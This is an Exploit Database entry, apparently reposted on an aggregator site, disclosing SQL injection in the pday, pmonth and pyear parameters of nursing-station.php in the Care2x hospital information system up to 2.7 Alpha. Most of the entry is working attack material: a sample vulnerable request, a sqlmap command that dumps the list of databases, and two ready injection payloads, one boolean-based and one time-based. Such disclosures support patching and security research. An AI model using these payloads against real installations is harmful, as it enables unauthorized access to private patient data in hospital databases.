Care2x Integrated Hospital Info System 2.7 – ‘Multiple’ SQL Injection

• Exploit Database
• 18 阅读

• 作者： securityforeveryone.com
  日期： 2021-07-29
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/50165/

• # Exploit Title: Care2x Integrated Hospital Info System 2.7 - 'Multiple' SQL Injection
  # Date: 29.07.2021
  # Exploit Author: securityforeveryone.com
  # Vendor Homepage: https://care2x.org
  # Software Link: https://sourceforge.net/projects/care2002/
  # Version: =< 2.7 Alpha
  # Tested on: Linux/Windows
  # Researchers : Security For Everyone Team - https://securityforeveryone.com
  
  DESCRIPTION
  
  In Care2x < 2.7 Alpha, remote attackers can gain access to the database by exploiting a SQL Injection vulnerability via the "pday", "pmonth", "pyear" parameters.
  
  The vulnerability is found in the "pday", "pmonth", "pyear" parameters in GET request sent to page "nursing-station.php".
  
  Example:
  
  /nursing-station.php?sid=sid&lang=en&fwd_nr=&edit=1&retpath=quick&station=123123&ward_nr=1&dept_nr=&pday=[SQL]&pmonth=[SQL]&pyear=[SQL]&checkintern= 
  
  if an attacker exploits this vulnerability, attacker may access private data in the database system.
  
  EXPLOITATION
  
  # GET /nursing-station.php?sid=sid&lang=en&fwd_nr=&edit=1&retpath=quick&station=station&ward_nr=1&dept_nr=&pday=[SQL]&pmonth=[SQL]&pyear=[SQL]&checkintern= HTTP/1.1
  # Host: Target
  
  Sqlmap command: sqlmap.py -r request.txt --level 5 --risk 3 -p year --random-agent --dbs 
  
  Payload1: pyear=2021') RLIKE (SELECT (CASE WHEN (9393=9393) THEN 2021 ELSE 0x28 END)) AND ('LkYl'='LkYl
  Payload2: pyear=2021') AND (SELECT 4682 FROM (SELECT(SLEEP(5)))wZGc) AND ('dULg'='dULg